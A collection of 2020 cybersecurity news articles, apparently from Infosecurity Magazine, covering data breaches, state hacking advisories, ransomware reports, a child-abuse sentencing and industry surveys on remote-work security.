Author Archives: www.infosecurity-magazine.com

Major Upgrade for Channel Island’s Telecom Network

Major Upgrade for Channel Island's Telecom Network

Guernsey is to benefit from a major performance upgrade and security enhancement to its telecom network.

British technology and network services company Telent Technology Services Ltd. (telent) has been awarded a contract by Sure to upgrade the service provider’s core network.

Under the contract, Telent will replace Sure’s existing 10G core network with a 100G Juniper Networks core network. The upgrade is being undertaken to allow Sure to deliver faster, more reliable internet connectivity to its consumer and business customers across the island as increasing bandwidth usage and data consumption create what Telent described as "unprecedented demand."

“Growing data consumption means demand for higher network capacity and speed is growing and service providers must ensure they are delivering on that,” said Shani Latif, sales director at Telent. 

“This upgrade for Sure will incorporate the latest technologies to ensure a future-proof network, while our experience and knowledge of the service provider market will minimize customer disruption and ensure work is completed efficiently.”

Once complete, the move to 100G will produce benefits to folks beyond the island's sandy beaches and picturesque bays. As a core network, it will also deliver increased capacity to London and Paris, connecting the Channel Islands to the rest of the world.

The upgrade will provide extra capacity for growth, future-proofing the network as growing and new technologies, including Fiber-to-the-Home (FTTH) and 5G, are rolled out commercially. 

Mindful of the need for cybersecurity, Telent will implement a joint Juniper-Corero Distributed Denial of Service (DDoS) solution to provide real-time, automated DDoS protection.

Sure Group CEO Ian Kelly said that ensuring people can stay connected is more important than ever as the COVID-19 health crisis limps on. 

“The current situation is a clear reminder that telecoms are a key and growing component of our economy and daily lives,” said Kelly. 

“This network upgrade is a significant long-term investment to ensure we can continue to meet customer expectations now and in the future. We are pleased to be working with Telent which has a long history and strong reputation in the design, upgrade, build and maintenance of critical networks.”

Work on the project has already started and is expected to be completed by early 2021.

Minneapolis City and Police Websites Attacked

Minneapolis City and Police Websites Attacked

Police and city websites in Minneapolis have come under cyber-attack as both lawful protests and illegal rioting continue across America. 

The nationwide social upheaval was triggered by the death of Houston native George Floyd in the city a week ago. Floyd died after 44-year-old police officer Derek Chauvin arrested him and kneeled on his neck for nearly nine minutes despite the handcuffed man's pleas that he could not breathe.

Floyd, who had recently lost his job due to the COVID-10 pandemic, was arrested after allegedly using forged money to pay a bill at a grocery store. 

Following Floyd's tragic death, filmed by bystanders who sadly let the chance to intervene slip through their fingers, Chauvin was fired from his job. The former cop was arrested and charged with third-degree murder and second-degree manslaughter on May 29.

Chauvin's arrest has not put an end to the peaceful protests inspired by the police officer's failure to uphold a sworn promise to protect and serve the public. Nor has it doused the outbreaks of looting and vandalism that have seen American businesses, churches, and educational establishments raided, torched, and destroyed.  

Some of the city of Minneapolis' public websites and systems were hit by a cyber-attack on Thursday morning. A city spokesperson told The Hill that a denial of service (DoS) attack had resulted in the temporary shutdown of some websites and systems. 

Within hours of the incident, 95% of affected systems and sites were back up and running. It is not known whether the attack was specifically linked to the protests over Floyd's death or simply timed to exploit a city in turmoil. 

“Although these types of attacks are not completely unavoidable, they are fairly common, and the City of Minneapolis has proactive measures in place to respond to and mitigate disruptions when they do occur,” the spokesperson said. 

“The City of Minneapolis IT continues to monitor its cyber platforms to ensure further disruption doesn't happen again.”

A DoS attack was also levied at the state level. In a news briefing delivered yesterday, Minnesota governor Tim Walz said Minnesota's computers were assaulted on Saturday night.

"Before our operation kicked off last night, a very sophisticated denial of service attack on all state computers was executed," said Walz.

Payment App Data Breach Exposes Millions of Indians’ Data

Payment App Data Breach Exposes Millions of Indians' Data

A major data breach at mobile payment app Bharat Interface for Money (BHIM) has exposed the personal and financial data of millions of Indians.

The breach occurred after BHIM failed to securely store vast swathes of data collected from users and businesses during a sign-up campaign.

On April 23, researchers at vpnMentor made the alarming discovery that all the data related to the campaign was publicly accessible after being stored in a misconfigured Amazon Web Services S3 bucket.

"The scale of the exposed data is extraordinary, affecting millions of people all over India and exposing them to potentially devastating fraud, theft, and attack from hackers and cybercriminals," wrote researchers.  

Data exposed in the breach included scans of Ardaar cards (India’s national ID cards), Caste certificates, professional and educational certificates, photos used as proof of residence, Permanent Account Number (PAN) cards associated with Indian income tax services, and screenshots captured within financial and banking apps as proof of fund transfers—all documents needed to open a BHIM account.

Private personal user data contained within these documents included names, dates of birth, age, gender, home address, Caste status, religion, biometric details, fingerprint scans, ID photos, and ID numbers for government programs and social security services.

Over 7 million records dating from February 2019 were exposed, some of which belonged to people aged under 18 years old.

After investigating the breach, vpnMentor's team found 409 GB of data stored insecurely by BHIM, which operates via the website www.cscbhim.in. Researchers traced the bucket back to BHIM as it was labeled “csc-bhim.”

Researchers informed BHIM of their discovery but did not receive a response, so contacted India’s Computer Emergency Response Team (CERT-In). 

"Many weeks later, we contacted CERT-In a second time," wrote researchers. "Shortly thereafter, the breach was closed."

The Indian mobile payment app was launched in 2016 to facilitate instant e-payments and money transfers between bank accounts via a user's smartphone. By 2020, the popular app had been downloaded 136 million times, according to non-profit business consortium, the National Payments Corporation of India (NPCI).

Aussie Football Site Leaks 70 Million Records

Aussie Football Site Leaks 70 Million Records

An Australian football fan site has been found leaking 70 million records, including users’ personal details and racist private messages, via an unprotected Elasticsearch instance.

The 132GB leak was discovered by SafetyDetectives researchers led by Anurag Sen and is linked to BigFooty.com, a website and mobile app dedicated to Aussie Rules Football, which has around 100,000 members.

Although the information found in the leak wasn’t always personally identifiable as users are mainly anonymous, some of the private messages seen by the researchers contained email addresses, mobile phone numbers and usernames and passwords for the site and live streams.

If discovered by cyber-criminals probing for misconfigured databases, the latter may have been useful for credential stuffing attacks on other sites.

Some user messages featured in the leak contained personal threats and racist content, which could be used by hackers to blackmail the individuals, SafetyDetectives argued.

“Private messages are fully exposed in the leak and can be traced back to specific users. This includes some high-profile users such as Australian police officers and government employees,” it said.

“Private information belonging to such individuals, including chat transcripts and email addresses, were found on the database which thereby creates a significant vulnerability in terms of potential blackmail and other reputational damage that could be caused.”

Technical data relating to the site including IP addresses, access logs, server and OS information and GPS data were also leaked, potentially allowing hackers to compromise other parts of the IT infrastructure, the firm added.

Although BigFooty didn’t respond to outreach from Sen and his team, the leak was closed shortly after they contacted government agency the Australian Cyber Security Center.

Over the past few months, SafetyDetectives has discovered similar accidental leaks at two popular money-saving websites and, perhaps most alarmingly, an adult live streaming site.

Trump Plans to Ban Chinese Students with Military Ties

Trump Plans to Ban Chinese Students with Military Ties

The Trump administration is reportedly accelerating plans to ban Chinese students with military ties from attending university in the US, as Beijing prepares its own national security law for Hong Kong.

American officials with knowledge of the discussions at the top of government told the New York Times that the long-mooted plan would involve cancelling student visas for Chinese students who took their undergraduate courses at military-affiliated institutions back home.

The fear is that many of these individuals may be actively selected by the Chinese government, and required to collect information from the research projects they end up working on. There’s a double threat from those same graduates then landing jobs at high-profile US tech companies and continuing their espionage activities.

It’s unclear how widespread the practice actually is, and students engaged in wrongdoing would certainly try to hide their affiliation.

Back in January, the Department of Justice (DoJ) indicted a People’s Liberation Army lieutenant who lied about her background and secured a position studying at Boston University’s (BU) Department of Physics, Chemistry and Biomedical Engineering from October 2017 to April 2019. There, she allegedly stole info for military research projects and profiled US scientists for her bosses.

Estimates suggest only around 3000 individuals would be affected by the mooted plans out of a potential 360,000 Chinese students in the US, although if they are formally announced it would come at a significant juncture.

Washington is currently mulling how to respond to Beijing’s newly announced plans to force a national security law on Hong Kong, which would allow China’s fearsome secret police to be stationed in the supposedly semi-autonomous region.

Rebecca Bernhard, partner at international law firm Dorsey & Whitney, explained that the US plans only affect those on F and J visas, although more may be caught up in trying to prove themselves innocent.

“Due to the scrutiny to determine which students will be suspended from entry, all students and scholars will face a lot of questions and the burden will likely be on the students and scholars to document that their research program is not subject to the bar – it appears the presumption is that the bar applies and the student or scholar will need to document that it does not,” she argued. 

“Unfortunately, this suggests to me that there will be even more delays at US consulates when they finally re-open for all Chinese graduate students and scholars in engineering."

Amtrak Guest Rewards Breach Affects Personal Info

Amtrak Guest Rewards Breach Affects Personal Info

Amtrak has revealed that some customers may have had their personal information and log-ins stolen after it detected unauthorized access of rewards accounts by a third party.

Also known as the National Railroad Passenger Corporation, the state-backed US transportation provider revealed the news in a regulatory filing with the Office of the Vermont Attorney General.

“On the evening of April 16, 2020, Amtrak determined that an unknown third party gained unauthorized access to certain Amtrak Guest Rewards accounts,” it noted. “We have determined that compromised usernames and passwords were used to access certain accounts and some personal information may have been viewed. No financial data, credit card information or Social Security numbers were compromised.”

The statement claimed that Amtrak’s IT security team terminated the unauthorized access “within a few hours,” reset passwords for affected accounts and hired outside security experts to contain the incident and put safeguards in place.

The firm is also offering affected customers a free year’s membership for the Experian IdentityWorks fraud monitoring service, although such offerings only flag suspicious account activity after the event and won’t be able to stop the potential follow-on phishing attacks that could target users.

It’s unclear how the attacker got hold of Amtrak Guest Reward usernames and passwords in the first place, although the credentials may have been breached in another incident and were being reused by customers across multiple sites/accounts.

This isn’t the first time the railroad giant has been forced to alert the authorities about a suspected breach. In 2018, it revealed that service provider Orbitz had suffered a security incident exposing customers’ personal information.

A year later, critical vulnerabilities were discovered in the Amtrak mobile application which researchers said could lead to a data breach of at least six million Amtrak Guest Rewards accounts.

It’s unclear how many passengers were affected in the latest data breach incident.

Utah Tech CEO Jailed for Possessing Thousands of Files Depicting Child Sexual Abuse

Utah Tech CEO Jailed for Possessing Thousands of Files Depicting Child Sexual Abuse

The 40-year-old one-time CEO of a Utah tech company is serving a custodial sentence after downloading over 13,000 images of child sexual abuse, bestiality, and rape. 

Douglas Eugene Saltsman was sentenced yesterday to 210 days in prison and 48 months of probation by Utah 3rd District Judge Douglas Hogan after being convicted on three felony charges of sexual exploitation of a minor. 

Addressing the virtual court, Saltsman said he had sought help from a psychiatrist after recognizing that he had illegal sexual tendencies. 

The former CEO of the now defunct blockchain and cryptocurrency company Saltmine said he was unable to control himself despite being put on medication and enrolled in therapy.

Utah's Internet Crimes Against Children Task Force raided Saltsman's Sandy home on May 7 last year. A search of his laptop, computer, an SD card, and an SSD storage device turned up more than 13,000 files containing images of graphic sexual abuse.

One of the files consisted of a compilation video of girls from the ages of 3 to 8 years old being bound and raped. The files were seized and sent to the National Center for Missing and Exploited Children’s law enforcement clearinghouse in a bid to identify the victims. 

Saltsman initially faced 11 felony counts of sexual exploitation of a minor, but in March 2020 he agreed to plead guilty to three felonies in exchange for the dismissal of the remaining seven charges.

Under the terms of the deal, Saltsman could only be handed the maximum recommended sentence for a first-time offender set 14 years ago by the Utah Sentencing Commission—210 days in jail and four years on probation.

An online petition to recall Judge Hogan has been signed by 114,000 people who felt Saltsman's sentence was too lenient and were presumably unaware of the agreed-upon deal. 

Saltsman's sentencing comes just weeks after the former director of operations for Salt Lake City Airport, 69-year-old Randall Darwood Berg, was charged with 25 counts of sexual exploitation of a minor. 

Berg, of Draper, is accused of possessing approximately 50,000 images of child sexual abuse. His residence was searched following the submission of eight separate Cybertip reports to the NCMEC alleging Berg was storing illegal files on a Google Photo account.

Texas University to Create Cybersecurity Innovation Institute

Texas University to Create Cybersecurity Innovation Institute

The University of Texas at San Antonio (UTSA) is to create and lead a new federal digital research institute that will devise ways to shield America's manufacturers from cyber-threats. 

In addition to assisting US industry in blocking cyber-attacks, the Cybersecurity Manufacturing Innovation Institute (CyManII) will explore how to help manufacturers achieve energy efficiency. 

Other areas of focus will include supporting technical innovation, job creation, and assisting manufacturers to be more competitive. 

The National Security Collaboration Center (NSCC) at UTSA, with more than 25,000 square feet of space, has been dedicated as the home base for CyManII.

Explaining why UTSA was chosen for the institute, James Milliken, chancellor for the UT system said: “We selected UTSA to lead CyManII due to the university’s well-known strengths in cybersecurity and national connectivity in this space.”

In order to bring the project to life, UTSA will receive $70m over a five-year period under a cooperative agreement with the US Department of Energy.

The UT system will inject an additional $10m into the institute, and a further $30m will be contributed by other cost-sharing partners. 

“CyManII leverages the unique research capabilities of the Idaho, Oak Ridge and Sandia National Laboratories as well as critical expertise across our partner cyber manufacturing ecosystem,” said UTSA president Taylor Eighmy. “We look forward to formalizing our partnership with the DOE to advance cybersecurity in energy-efficient manufacturing for the nation.”

Building a national program for education and workforce development, securing automation, and securing the supply-chain network are three high-priority areas on which CyManII will focus its national strategy. 

“As United States manufacturers increasingly deploy automation tools in their daily work, those technologies must be embedded with powerful cybersecurity protections,” said Howard Grimes, CyManII chief executive officer and associate vice president and associate vice provost for institutional initiatives at UTSA. 

“UTSA has assembled a team of best-in-class national laboratories, industry, nonprofit and academic organizations to cyber-secure the US manufacturing enterprise. Together, we will share the mission to protect the nation’s supply chains, preserve its critical infrastructure and boost its economy.”

UK Government Launches Funding Program to Boost Security of IoT Market

UK Government Launches Funding Program to Boost Security of IoT Market

The UK government has today launched a program to incentivize the creation of design schemes that test the security of Internet of things (IoT) products. Under the initiative, innovators are encouraged to bid for funding from a pot of £400,000 to create more assurance schemes, which ultimately aims to boost the security of consumer-smart products.

Assurance schemes are vital in the IoT product market, as they prove that a device has undergone independent testing or a robust and accredited self-assessment process. Their importance is set to grow, with an estimated 75 billion internet connected devices, such as televisions, cameras and home assistants, to be in homes around the world by the end of 2025.

It is hoped the program will provide manufacturers with a variety of options to choose from in testing their consumer-smart products in accordance with the UK’s Code of Practice for Consumer IoT Security. An increase in these assurance schemes will also assist retailers in stocking secure IoT devices and customers in making security-conscious purchasing decisions.

Digital Minister Matt Warman, from the Department for Digital, Culture, Media and Sport (DCMS) commented: “We are committed to making the UK the safest place to be online and are developing laws to make sure robust security standards for consumer internet-connected products are built in from the start.

“This new funding will allow shoppers to be sure the products they are buying have better cybersecurity and help retailers be confident they are stocking secure smart products.”

Commenting on the announcement, Jake Moore, cybersecurity specialist at ESET, said: “This comes at a time when IoT seems to have been forgotten about, yet funding to support the security of such devices couldn’t be more vital. Many people favor convenience over security so it’s paramount that IoT devices come fitted with security by design, to help protect the devices and customers. This is usually where the manufacturers choose cutting costs over the protection of the end users, which in turn puts the users at risk of a range of potential attacks. Hopefully this will be the beginning of more funding as I’m not sure how far this initial input will go.”

The move comes amid other initiatives being taken by the UK government to combat cybercrime. These include legislation to bring in minimum security requirements for smart devices, and last month the government launched the ‘Cyber Aware’ campaign to advise people on protecting passwords, accounts and devices.

Warman added: “People should continue to change default passwords on their smart devices and regularly update software to help protect themselves from cyber-criminals.”

Alabama Seniors Offered Free Cybersecurity Courses

Alabama Seniors Offered Free Cybersecurity Courses

Seniors in Alabama are being given the chance to learn about cybersecurity free of charge thanks to the University of Alabama.

Cybersecurity is just one of a batch of free online adult education courses being offered by the university's Osher Lifelong Learning Institute (OLLI).

Usually, OLLI courses are delivered in a traditional classroom setting; however, all in-person programming has been suspended in an effort to slow the spread of COVID-19. To keep adult education services up and running, courses are now being taught via the video-conferencing app Zoom.

OLLI director Jennifer Anderson said: “OLLI is privileged to be in a position to provide educational and social opportunities online for its members and the community, some of whom are the most vulnerable to coronavirus and may be among the last of our citizens to emerge from their homes, even as social distancing guidelines are lifted in our community."

Anderson said adults aged over 50 were just as much in need of social and intellectual stimulation as any other group in society, especially while lockdown measures remain in place. 

“Our members, like everyone else, can only spend so much time alone, cleaning their homes and reading,” said Anderson. “They need their social network, and interactive online classes provide that along with intellectual aspects.”

OLLI's wide-ranging courses cover everything from shadow wars of tariffs and sanctions with Iran to arthritis exercises and awareness and the love stories that made history.

Courses are developed by OLLI’s curriculum committee and based on newsworthy topics, events that changed history, or useful skills to have in the modern world. Tutors are chosen by the committee from a pool of experts, educators, and professionals.

Anderson said that instead of simply logging on and viewing pre-recorded video content, mature students who take advantage of free OLLI courses are encouraged to actively engage with the learning process. 

“We hope viewers will experience the education, entertainment and social benefits,” Anderson said. 

“OLLI students will not just ‘view’ their classes. They will participate because the classes are synchronous. Participants can speak in class and the instructors can have discussions in addition to the lectures provided.”

Most Organizations Not Prepared to Safely Support Home Working

Most Organizations Not Prepared to Safely Support Home Working

Most organizations are not sufficiently prepared to securely support remote working even though 84% intend to continue this practice beyond COVID-19 lockdowns, according to Bitglass’ 2020 Remote Workforce Report. The survey of IT professionals found that 41% of businesses have not taken any steps to expand secure access for the remote workforce, while 65% are allowing personal devices to access managed applications.

The study was undertaken to better understand how well businesses were prepared, from a cybersecurity perspective, for the sudden surge in remote working as a result of the pandemic.

Of those surveyed, 50% said lack of proper equipment was the biggest barrier to providing secure access for employees working from home. The types of applications that organizations were most concerned about securing were file sharing (68%), web applications (47%) and video conferencing (45%).

Malware was listed as the most concerning threat vector related to remote working by IT professionals (72%), followed by unauthorized user access (59%). Unsurprisingly, anti-malware was the most utilized security tool for remote work, at 77%. However, there was a lack of deployment of tools like single sign-on (45%), data loss prevention (18%) and user and entity behaviour analytics (11%).

“This research indicates that many organizations are not implementing the security measures necessary to protect their data in the current business environment,” commented Anurag Kahol, CTO of Bitglass. “For example, while respondents said that the pandemic has accelerated the migration of user workflows and applications to the cloud, most are not employing cloud security solutions like single sign-on, data loss prevention, zero trust network access or cloud access security brokers.

“On top of that, 84% of organizations reported that they are likely to continue to support remote work capabilities even after stay at home orders are lifted. To do this safely, they must prioritize securing data in any app, any device, anywhere in the world.”

Another worrying aspect of the study was that 63% of respondents believed remote working would impact their compliance with regulatory mandates, with 50% citing GDPR specifically.

NSA: Russian Military Sandworm Group is Hacking Email Servers

NSA: Russian Military Sandworm Group is Hacking Email Servers

The US National Security Agency (NSA) has released a new alert warning that Russian state hackers have been exploiting a vulnerability in Exim email servers for over nine months.

Exim is mail transfer agent (MTA) software developed by the University of Cambridge which is used on Unix-based operating systems. Bundled with many popular Linus distributions like Red Hat and Debian, it’s thought to run on millions of email servers globally.

However, the NSA warned that organizations which have failed to patch CVE-2019-10149, which was fixed in June 2019, may be at risk of attack from the infamous Sandworm group.

“The actors exploited victims using Exim software on their public facing MTAs by sending a command in the ‘MAIL FROM’ field of an SMTP (Simple Mail Transfer Protocol) message,” the advisory stated.

“An unauthenticated remote attacker can send a specially crafted email to execute commands with root privileges allowing the attacker to install programs, modify data, and create new accounts.”

Specifically, when CVE-2019-10149 is exploited by Sandworm, the targeted machine downloads and executes and shell script from a domain under the group’s control. This script will in turn attempt to: add privileged users, disable network security settings, update SSH configuration to enable additional remote access and execute an additional script to enable follow-on exploitation.

The NSA urged organizations to upgrade their Exim installations to 4.93 or newer, and use network-based security appliances to detect and/or block CVE-2019-10149 exploit attempts.

Staffed by operatives from the Russian GRU (military intelligence) Main Center for Special Technologies (GTsST), field post number 74455, Sandworm is known to be one of the most sophisticated state hacking outfits around.

It has been widely linked to the BlackEnergy malware used in attacks on Ukrainian power stations in 2015 and 2016, which caused major outages during winter, as well as campaigns against NATO members and European governments in 2019.

Revealed: Advanced Java-Based Ransomware PonyFinal

Revealed: Advanced Java-Based Ransomware PonyFinal

Microsoft has warned of a new type of data stealing Java-based ransomware, dubbed PonyFinal.

PonyFinal is what Microsoft describes as “human-operated ransomware” — to distinguish it from commoditized variants that are distributed in an automated way by hackers.

The tech giant’s Security Intelligence group revealed in a series of tweets this week that the first stage involves access to a targeted organization via brute force attacks against the systems management server.

A VBScript is deployed to run a PowerShell reverse shell which enables data exfiltration to a C&C server over Port 80. The attackers also deploy a remote manipulator system to bypass event logging.

“In certain cases, the attackers deploy Java Runtime Environment (JRE), which the Java-based PonyFinal ransomware needs to run. However, evidence suggests that attackers use information stolen from the systems management server to target endpoints with JRE already installed,” Microsoft continued.

Thus, if organizations already have JRE on their systems, they may be blind to any attack.

“The PonyFinal ransomware is delivered through an MSI file that contains two batch files and the ransomware payload,” Microsoft continued. “UVNC_Install.bat creates a scheduled task named 'Java Updater' and calls RunTask.bat, which runs the payload, PonyFinal.JAR.”

According to Microsoft, PonyFinal encrypts files at a specific date and time and, like similar “human-operated” ransomware attacks, it is likely that those wielding it will bide their time to wait for the most opportune moment to deploy the payload.

In the case of recent attacks on hospitals, that was in early April when many healthcare organizations were battling a peak of COVID-19 admissions.

Microsoft recommends that organizations reduce their attack surface by ensuring internet-facing assets are up-to-date with patches, especially VPNs and other remote access infrastructure, and conducting regular audits of misconfigurations and vulnerabilities.

For PonyFinal in particular it is recommended to scan for brute force activity.

Over 600 NTT Customers Hit in Major Data Breach

Over 600 NTT Customers Hit in Major Data Breach

One of the world’s largest telecoms and IT services companies has revealed that attackers may have stolen data from its internal systems, affecting over 600 customers.

NTT Communications provides cloud, network and data center services to some of the world’s biggest companies. Its parent, NTT Group, is ranked in the top 100 of the Fortune Global 500.

The firm claimed in a lengthy statement on Thursday that it detected unauthorized access to its Active Directory (AD) server on May 7, confirming the attack four days later.

Although an English language version of the notice has yet to be published, it appears that hackers first compromised a cloud server (labelled server B by the firm) located in its Singapore data center, before using it as a stepping stone to attack another internal server (server A) and its AD server.

Attackers also jumped from server B to compromise an information management server (server C) used to service NTT's cloud and hosting customers.

It is server C which NTT Communications claimed attackers may have breached to steal data on 621 customers.  

The firm said it is taking steps to mitigate the incident and prevent anything similar happening in the future.

Just last week, NTT warned in its annual Global Threat Intelligence Report that the technology sector was the most attacked worldwide in 2019.

It claimed that hackers are increasingly using “multi-function attack tools” and artificial intelligence/machine learning capabilities, as well as automation techniques, to increase their chances of success. Over a fifth (21%) of attacks globally featured some form of vulnerability scanner, it said.

The type of NTT customer data stolen by hackers in May and the techniques used to compromise servers and move laterally inside its network are unclear at this stage.

Comedian Arrested for Cybercrime over Face Swap

Comedian Arrested for Cybercrime over Face Swap

Tanzanian comedian Idris Sultan has been arrested after posting a face-swap photo on social media involving his president. 

Earlier this month, Sultan shared images of himself and of Tanzanian president John Pombe Magufuli in which the faces of each subject had been swapped over. One of the pictures shows Sultan posing on a presidential chair with the national seal, while the other shows the president's face on the comedian's body.

Sultan's lawyer, Benedict Ishabakaki, said the comedian and radio show host was summoned by police on May 19 and questioned over a possible violation of a law against cyberbullying.

According to news agency the AFP, Sultan was subsequently charged with a lesser offense related to using a SIM card registered in someone else's name.

Sultan, a former show winner of the TV series Big Brother Africa, was released from police custody on May 27 after posting bail of 15 million Tanzanian shillings (more than $6,000).

His hearing was attended by his sister and vocalist Lulu Diva and by the singer Lady Jay Dee. 

The comedian's release comes the day after opposition leaders and activists launched a Twitter campaign to demand that the case against Sultan be dismissed. 

Sultan is no stranger to Tanzania's legal system. In October last year, the comedian was arrested for photoshopping President Magufuli’s face onto a picture of himself and sharing it with his 5 million followers on social media.

The comedian said that he had shared the photo in good faith as a way to celebrate the president's birthday on October 29. 

Sultan said: “I had no ill intentions; I was just wishing the president a happy birthday. If the president did not like my birthday message, I apologize."

Following his foray into photoshopping, Sultan was accused of violating Tanzania's Cybercrimes Act, which forbids the use of a computer to impersonate someone else. After being questioned over his alleged intent to "coerce, intimidate, harass or cause emotional distress," the comedian was eventually released without charge.

Magufuli took office in 2015 as a corruption-fighting "man of the people" but has been criticized for his authoritarian leadership style. According to Human Rights Watch and Amnesty International, there is a "shrinking space for freedom of expression" in Tanzania.

Sultan's latest case is due to be heard in court on June 9.  

DoD Contractors Team Up with HPE on Ransomware-Stopper

DoD Contractors Team Up with HPE on Ransomware-Stopper

Hewlett Packard Enterprise (HPE) has announced the inclusion of RackTop Systems' BrickStor SP in its Complete program. 

BrickStor SP is a data security software platform that boldly claims to eliminate the threat of ransomware attacks and data breaches. The platform was built by Department of Defense intelligence community veterans charged with protecting the United States’ data while meeting the nation's data security compliance regulatory requirements.

HPE plans to resell RackTop BrickStor SP software with its own ProLiant and Apollo Servers to meet the high-security file-storage needs of  ]the federal government.

RackTop Systems CEO Eric Bednash said a prevailing failure to update their cybersecurity tools is making organizations in the United States vulnerable to cyber-attacks.  

“Enterprises and government entities are losing the cyber-war because they are using old tools and 90’s design standards which are largely focused on stopping network infiltration, rather than protecting data," said Bednash.

"Based on our experience, most of the bad guys are already inside the network today."

Explaining how RackTop's platform works to block ransomware attacks, Bednash said: “BrickStor attacks the problem properly by securing unstructured data at its source so that it can’t be seized, maliciously encrypted, or exploited. 

"Together with HPE and their world class secure and versatile hardware, for the first time, customers can achieve end-to-end infrastructure security from a single vendor without gaps or loosely coupled bolt-ons.”

Rapid and unstructured data growth can result in information's not being stored securely, making an organization vulnerable to cyber-attackers. Chris Powers, VP, Collaborative Platform Development, HPE Storage and Big Data, said RackTop tackles this issue by embedding its security and compliance software within a scalable data-storage system for unstructured files, protecting it at the source.

“BrickStor SP fills a high data security need in the storage market. We are entering a new era in IT infrastructure where security and compliance are a necessity,” said Powers.

“RackTop’s storage software and security platform is a natural fit with our ProLiant and Apollo Servers which feature silicon-anchored, cradle-to-grave security. Together we bring our Federal Government customers a complete Zero Trust data security solution.”

IT Leaders Overestimate Staff’s Commitment to WFH Security

IT Leaders Overestimate Staff's Commitment to WFH Security

IT leaders who trust their employees to follow security best practices while working from home are sadly overoptimistic.  

According to new research published today by email security firm Tessian, while 91% of IT leaders believe their staff are doing their best to work securely from home, 52% of employees believe toiling from home means they can get away with riskier behavior.

Tessian surveyed 2,000 employees across the US and the UK as well as 250 IT decision-makers to examine the state of data loss within organizations. Researchers also set out to learn how data loss is impacted by employees working remotely. 

The survey revealed that 48% of employees cite “not being watched by IT” as the number one reason for not following safe data practices when working from home. The second excuse given for working on the wild side was "being distracted."

While such results might lead one to conclude that tighter controls are needed to maintain security, Tim Sadler, CEO and co-founder of Tessian, said that this tactic would not work on its own.

"Business leaders need to address security cultures and adopt advanced solutions to prevent employees from making the costly mistakes that result in data breaches and non-compliance," said Sadler.

"It’s critical these solutions do not impede employees’ productivity though. We’ve shown that people will find workarounds if security gets in the way of them doing their jobs, so data loss prevention needs to be flexible if it’s going to be effective.” 

Researchers found that IT leaders in the US underestimate how many of their employees' emails are misdirected. While IT leaders in US organizations with over 1,000 employees estimate that 480 emails are sent to the wrong person every year, the real figure recorded by Tessian platform data is 1.6 times higher.

More than half of survey respondents―51%―said security policies were impeding their productivity, while 54% said that they will find workarounds if security policies stop them from doing their jobs. 

Compared to the UK, workers in the US were much more likely to act in way that could jeopardize the security of their company. Employees in the US were twice as likely to send an email to the wrong person and twice as likely to take company documents home with them when they leave a job.

Intelligence Gateway Launches to Compile Malicious #COVID19 URLs

Intelligence Gateway Launches to Compile Malicious #COVID19 URLs

An internet intelligence gateway has been established to analyze and compile malicious URLs related to COVID-19.

With thousands of newly created COVID-19-related malicious websites launching every day, the gateway accepts submissions of suspicious URLs or emails, providing a lookup service that taps into RiskIQ’s infrastructure to analyze and compile malicious URLs related to COVID-19. Submissions are analyzed by RiskIQ’s systems and each malicious URL is added to RiskIQ blacklists through community participation.

Over a two-week period, RiskIQ noted 317,000 new websites related to COVID-19. 

“Our goal with the gateway is to help the security community work together in our response to the influx of criminal activity,” said RiskIQ CEO Lou Manousos. “The COVID-19 Internet Intelligence Gateway will be a powerful resource for keeping organizations safe during this crisis.”

The gateway will also allow security teams to block blacklists of known bad infrastructure to immediately protect their organizations from new campaigns leveraging the COVID-19 crisis.

Also newly launched is a COVID-19 Chrome Extension, which allows users to submit suspect URLs, host names or domains to RiskIQ for “crawling” purposes. Reports will include detailed information from the crawl, including referenced pages, screenshots and classification of content.

In April, it was reported that 18 million malware and phishing Gmail messages related to COVID-19 were detected by  Google’s Threat Analysis Group per day, in addition to more than 240 million COVID-related daily spam messages.

It detected examples including fake solicitations from charities and NGOs, messages trying to mimic employer communications and employees working from home, along with websites posing as official government pages and public health agencies.

C-Level Executives the Weakest Link in Organizations’ Mobile Security

C-Level Executives the Weakest Link in Organizations’ Mobile Security

C-suite executives are the people most susceptible to mobile-based cyber-attacks in businesses, according to a study from MobileIron. The report, entitled Trouble at the Top found that while these executives are highly targeted by cyber-criminals in attacks on organizations, they are also more likely than anyone else to have a relaxed attitude to mobile security.

In the analysis, research from 300 enterprise IT decision makers across Benelux, France, Germany, the UK and the US was combined with findings from 50 C-level executives from the UK and the US. It revealed that many C-level executives find mobile security protocols frustrating, with 68% feeling IT security compromises their personal privacy, 62% stating it limits the usability of their device and 58% finding it too complex to understand.

As a result of these issues, 76% of C-suite executives had asked to bypass one or more of their organization’s security protocols last year. This included requests to: gain network access to an unsupported device (47%), bypass multi-factor authentication (45%) and obtain access to business data on an unsupported app (37%).

“These findings are concerning because all of these C-suite exemptions drastically increase the risk of a data breach,” commented Brian Foster, SVP product management, MobileIron. “Accessing business data on a personal device or app takes data outside of the protected environment, leaving critical business information exposed for malicious users to take advantage of. Meanwhile, multi-factor identification – designed to protect businesses from the leading cause of data breaches, stolen credentials – is being side-stepped by C-suite execs.” 

To exacerbate this issue, IT decision makers included in the study overwhelmingly stated that C-suite is the group most likely to both be targeted by (78%), and fall victim to (71%), phishing attacks.

Foster added: “These findings highlight a point of tension between business leaders and IT departments. IT views the C-suite as the weak link when it comes to cybersecurity, while execs often see themselves as above security protocols.”

Cyber-Criminals Impersonating Google to Target Remote Workers

Cyber-Criminals Impersonating Google to Target Remote Workers

Remote workers have been targeted by up to 65,000 Google-branded cyber-attacks during the first four months of 2020, according to a new report by Barracuda Networks. The study found that Google file sharing and storage websites were used in 65% of nearly 100,000 form-based attacks the security firm detected in this period.

According to the analysis, a number of Google-branded sites, such as storage.googleapis.com, docs.google.com, storage.cloud.google.com and drive.google.com, were used to try and trick victims into sharing login credentials. Google-branded attacks were far in excess of those impersonating Microsoft, with the sites onedrive.live.com, sway.office.com and forms.office.com making up 13% of attacks.

Other form-based sites used by attackers included sendgrid.net (10%), mailchimp.com (4%) and formcrafts.com (2%).

Overall, the use of the Google brand by cyber-criminals to trick users appears to be increasing: Barracuda Networks observed Google-brand impersonation attacks represented 4% of all spear-phishing attacks during the first four months of 2020. This figure is expected to rise, as it has proved to be successful in the harvesting of credentials.

Steve Peake, UK systems engineer manager, Barracuda Networks, outlined: “Brand-impersonation spear-phishing attacks have always been a popular and successful method of harvesting a user’s login credentials, and with more people than ever working from home, it’s no surprise that cyber-criminals are taking the opportunity to flood people’s inboxes with these scams. The sophistication of these attacks has accelerated in recent times: now, hackers can even create an online phishing form or page using the guise of legitimate services, such as forms.office.com, to trick unsuspecting users.”

